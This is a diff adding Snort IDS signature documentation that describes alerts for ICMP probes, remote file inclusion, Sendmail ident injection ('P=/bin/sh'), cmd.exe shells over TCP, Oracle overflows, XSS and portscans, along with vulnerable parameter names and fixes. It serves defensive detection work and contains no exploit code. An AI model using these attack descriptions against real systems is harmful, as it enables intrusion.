+++ b/doc/signatures/1813.txt
@@ -0,0 +1,52 @@
+Rule:
+
+--
+Sid:
+1813
+
+--
+Summary:
+This event is generated when an ICMP request is made to gain information on available bandwidth.
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+An ICMP request is used to elicit information on the bandwidth available on a connection. Digital Island is a company that specializes in content delivery systems.
+
+--
+Affected Systems:
+All
+
+--
+Attack Scenarios:
+An attacker may attempt to determine the bandwidth available to the host.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Block inbound ICMP requests.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000736.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000736
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Geeklog" application running on a webserver. Access to the file "MassDelTrackback.Admin.class.php" using a remote file being passed as the "$_CONF[path]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "$_CONF[path]" parameter in the "MassDelTrackback.Admin.class.php" script used by the "Geeklog" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Geeklog
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/671.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+671
+
+--
+Summary:
+This event is generated when an external attacker attempts to exploit a vulnerability in Sendmail, where unexpected characters in ident messages are not properly parsed.
+
+--
+Impact:
+Severe. Remote execution of arbitrary code, leading to remote root compromise. 
+
+--
+Detailed Information:
+Sendmail 8.6.10 and earlier versions contain a vulnerability related to the parsing of unexpected characters (in this case, newline characters and a carriage return) in commands passed from ident to Sendmail. An attacker can use a specially crafted command with unexpected characters in an ident response to Sendmail. The message is not properly parsed and Sendmail forwards the response, with included commands, to its queue. The commands are then executed while the message awaits delivery in the Sendmail queue, causing the included arbitrary code to be executed on the server in the security context of Sendmail. 
+
+--
+Affected Systems:
+Systems running unpatched versions of Sendmail 8.6.10 or earlier.
+
+--
+Attack Scenarios:
+An attacker sends an email with newline characters and a carriage return, including a path variable of P=/bin/sh. Directives included in the transmission are executed while the message remains in the Sendmail queue.
+
+--
+Ease of Attack:
+Moderate. Multiple exploits exist, but the window of opportunity is small; the vulnerability must be exploited while the message is queued for delivery and must have sufficient time (the mail server must be busy/slow) to execute the commands.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest version of Sendmail.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0204
+
+Bugtraq
+http://www.securityfocus.com/bid/2311
+
+--
--- /dev/null
+++ b/doc/signatures/2123.txt
@@ -0,0 +1,53 @@
+Rule:
+
+--
+Sid: 2123
+
+
+--
+Summary:
+This event is generated when a Windows cmd.exe banner is detected in a TCP session. 
+
+--
+Impact:
+Remote access.
+
+--
+Detailed Information:
+This event indicates that a Windows cmd.exe banner has been detected in a TCP session. This indicates that someone has the ability to spawn a DOS command shell prompt over TCP.
+
+--
+Affected Systems:
+Windows operating systems.
+
+--
+Attack Scenarios:
+An attacker could be utilizing a backdoor to spawn a DOS command shell thus gaining access to the operating system and all data on the host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/1100.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1100
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000494.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+100000494
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "Zeroboard" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "$s_file_name" parameter in the "write_ok.php" 
+script used by the "Zeroboard" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using Zeroboard
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/377.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+Sid:
+377
+
+--
+Summary:
+This event is generated when an ICMP echo request is made from a Windows host running Network Toolbox 3 software.
+
+--
+Impact:
+Information gathering.  An ICMP echo request can determine if a host is active.
+
+--
+Detailed Information:
+An ICMP echo request is used by the ping command to elicit an ICMP echo reply from a listening live host.  An echo request that originates from a Windows host running Network Toolbox 3 software contains a unique payload in the message request.
+
+--
+Affected Systems:
+All
+
+--
+Attack Scenarios:
+An attacker may attempt to determine live hosts in a network prior to launching an attack.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+An ICMP echo request may be used to legimately troubleshoot networking problems.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Block inbound ICMP echo requests.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.org>
+Documented by Steven Alexander<alexander.s@mccd.edu>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS161
+
+--
--- /dev/null
+++ b/doc/signatures/2792.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2792
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure purge_master_log
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000485.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+100000485
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "RahnemaCo" application running on a webserver. 
+Access to the file "page.php" using a remote file being passed as the "osCsid" 
+parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "osCsid" parameter in the "page.php" script used by the 
+"RahnemaCo" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using RahnemaCo
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2630.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2630
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in database
+replication. The "register_user_repgroup" procedure contains a
+programming error that may allow an attacker to execute a buffer
+overflow attack.
+
+This overflow is triggered by a long string in a parameter for the
+procedure.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to the "privilege_type" variable
+to cause the overflow. The result could permit the attacker to gain
+escalated privileges and run code of their choosing. This attack
+requires an attacker to logon to the database with a valid username
+and password combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck94.html
+
+--
--- /dev/null
+++ b/doc/signatures/2813.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2813
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure abort_flavor_definition
+. This procedure is included in
+sys.dbms_repcat_fla.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1715.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1715
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/252.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+252
+
+--
+Summary:
+This event is generated when an attempt is made to send an inverse query
+to a DNS server. This could indicate a future attack.
+
+--
+Impact:
+Intelligence gathering. This is just an attempt to see if the DNS server
+responds to such a query.
+
+--
+Detailed Information:
+Certain versions of BIND fail to propery bound data recieved when 
+handling an inverse query. Upon being copied to memory, portions of the 
+program can be overwritten and arbitrary commands can be run on the 
+affected host.
+
+--
+Affected Systems:
+	BIND pre 8.1.2 / 4.9.8
+
+--
+Attack Scenarios:
+An attacker can send the reverse query and if the server responds the 
+attacker might then proceed to exploit the flaw in Bind.
+
+--
+Ease of Attack:
+Simple. Exploit code is available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade BIND.
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Josh Sakofsky
+
+-- 
+Additional References:
+
+RFC:
+http://www.rfc-editor.org/rfc/rfc1035.txt
+
+Bugtraq:
+http://www.securityfocus.com/bid/134
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0009
+
+Arachnids:
+http://www.whitehats.com/info/IDS277 
+
+--
--- /dev/null
+++ b/doc/signatures/122-2.txt
@@ -0,0 +1,93 @@
+
+
+Rule:
+
+--
+Sid:
+122-2
+
+--
+Summary:
+This event is generated when the pre-processor sfPortscan detects
+network traffic that may constitute an attack. Specifically a tcp decoy
+portscan was detected.
+
+--
+Impact:
+Unknown. This is normally an indicator of possible network
+reconnaisance and may be the prelude to a targeted attack against the
+targeted systems.
+
+--
+Detailed Information:
+This event is generated when the sfPortscan pre-processor detects
+network traffic that may consititute an attack.
+
+A portscan is often the first stage in a targeted attack against a
+system. An attacker can use different portscanning techniques and tools
+to determine the target host operating system and application versions
+running on the host to determine the possible attack vectors against
+that host.
+
+More information on this event can be found in the individual
+pre-processor documentation README.sfportscan in the docs directory of
+the snort source. Descriptions of different types of portscanning
+techniques can also be found in the same documentation, along with
+instructions and examples on how to tune and use the pre-processor.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+An attacker often uses a portscanning technique to determine operating
+system type and version and also application versions to determine
+possible effective attack vectors that can be used against the target
+host.
+
+--
+Ease of Attack:
+Simple. Many portscanning tools are freely available.
+
+--
+False Positives:
+While not necessarily a false positive, a security audit or penetration
+test will often employ the use of a portscan in the same way an
+attacker might use the technique. If this is the case, the
+pre-processor should be tuned to ignore the audit if so desired.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check for other events targeting the host.
+
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches as appropriate.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Daniel Roelker <droelker@sourcefire.com>
+Marc Norton    <mnorton@sourcefire.com>
+Jeremy Hewlett <jh@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Nmap:
+http://www.insecure.org/nmap/
+
+Port Scanning Techniques and the Defense Against Them - Roger
+Christopher, SANS:
+http://www.sans.org/rr/whitepapers/auditing/70.php
+
+Hypervivid Tiger Team - Port-Scanning: A Practical Approach
+http://www.hcsw.org/reading/nmapguide.txt
+
+--
--- /dev/null
+++ b/doc/signatures/122-12.txt
@@ -0,0 +1,93 @@
+
+
+Rule:
+
+--
+Sid:
+122-12
+
+--
+Summary:
+This event is generated when the pre-processor sfPortscan detects
+network traffic that may constitute an attack. Specifically an ip
+distributed protocol scan was detected.
+
+--
+Impact:
+Unknown. This is normally an indicator of possible network
+reconnaisance and may be the prelude to a targeted attack against the
+targeted systems.
+
+--
+Detailed Information:
+This event is generated when the sfPortscan pre-processor detects
+network traffic that may consititute an attack.
+
+A portscan is often the first stage in a targeted attack against a
+system. An attacker can use different portscanning techniques and tools
+to determine the target host operating system and application versions
+running on the host to determine the possible attack vectors against
+that host.
+
+More information on this event can be found in the individual
+pre-processor documentation README.sfportscan in the docs directory of
+the snort source. Descriptions of different types of portscanning
+techniques can also be found in the same documentation, along with
+instructions and examples on how to tune and use the pre-processor.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+An attacker often uses a portscanning technique to determine operating
+system type and version and also application versions to determine
+possible effective attack vectors that can be used against the target
+host.
+
+--
+Ease of Attack:
+Simple. Many portscanning tools are freely available.
+
+--
+False Positives:
+While not necessarily a false positive, a security audit or penetration
+test will often employ the use of a portscan in the same way an
+attacker might use the technique. If this is the case, the
+pre-processor should be tuned to ignore the audit if so desired.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check for other events targeting the host.
+
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches as appropriate.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Daniel Roelker <droelker@sourcefire.com>
+Marc Norton    <mnorton@sourcefire.com>
+Jeremy Hewlett <jh@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Nmap:
+http://www.insecure.org/nmap/
+
+Port Scanning Techniques and the Defense Against Them - Roger
+Christopher, SANS:
+http://www.sans.org/rr/whitepapers/auditing/70.php
+
+Hypervivid Tiger Team - Port-Scanning: A Practical Approach
+http://www.hcsw.org/reading/nmapguide.txt
+
+--
--- /dev/null
+++ b/doc/signatures/3051.txt
@@ -0,0 +1,64 @@
+Rule: 
+
+--
+Sid: 
+3051
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Ethereal.
+
+-- 
+Impact: 
+Serious. Denial of Service (DoS).
+
+--
+Detailed Information:
+Ethereal is a multi-platform network protocol analyser capable of
+displaying network data to the user in a graphical user interface.
+
+An error in the processing of access control lists (ACLs) concerning the
+size of the access control entries (ACEs) may lead to a Denial of Service
+(DoS) condition in Ethereal. The ACL parsing routine trusts the size of
+the ACE given in the packet during processing. If a sufficiently large ACL
+structure is supplied combined with a specified ACE size of 0, it is
+possible to cause the DoS condition to occur.
+
+--
+Affected Systems:
+	Ethereal 0.10.7 and prior
+
+--
+Attack Scenarios: 
+An attacker needs to craft packet data containing large NT ACLs, the
+attacker then needs to specify one of the ACEs as having a size of 0.
+
+-- 
+Ease of Attack: 
+Moderate.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1711.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1711
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1117.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1117
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1798.txt
@@ -0,0 +1,64 @@
+Rule:  
+--
+Sid:
+
+1798
+
+--
+Summary:
+This rule indicates that a webpage was visited the included the content "erotica".
+
+--
+Impact:
+Someone could be violating your company's policy regarding the browsing of inappropriate content.
+
+--
+Detailed Information:
+
+This rule looks for a response from a webserver containing "erotica".
+
+--
+Affected Systems:
+
+All
+
+--
+Attack Scenarios:
+
+Not an attack.  
+
+--
+Ease of Attack:
+
+N/A.
+
+--
+False Positives:
+
+This could have been caused by a pop-up window or spam with an embedded link to a pornographic website.  This could also be caused by somebody visiting the snort rule descriptions on the snort website. etc.etc.
+
+--
+False Negatives:
+
+None known.
+--
+Corrective Action:
+
+Dependent on your company's policies.   
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Steven Alexander<alexander.s@mccd.edu>
+-- 
+Additional References:
+
+
+
+
+
+
+
+--
--- /dev/null
+++ b/doc/signatures/1395.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1395
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1712.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1712
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
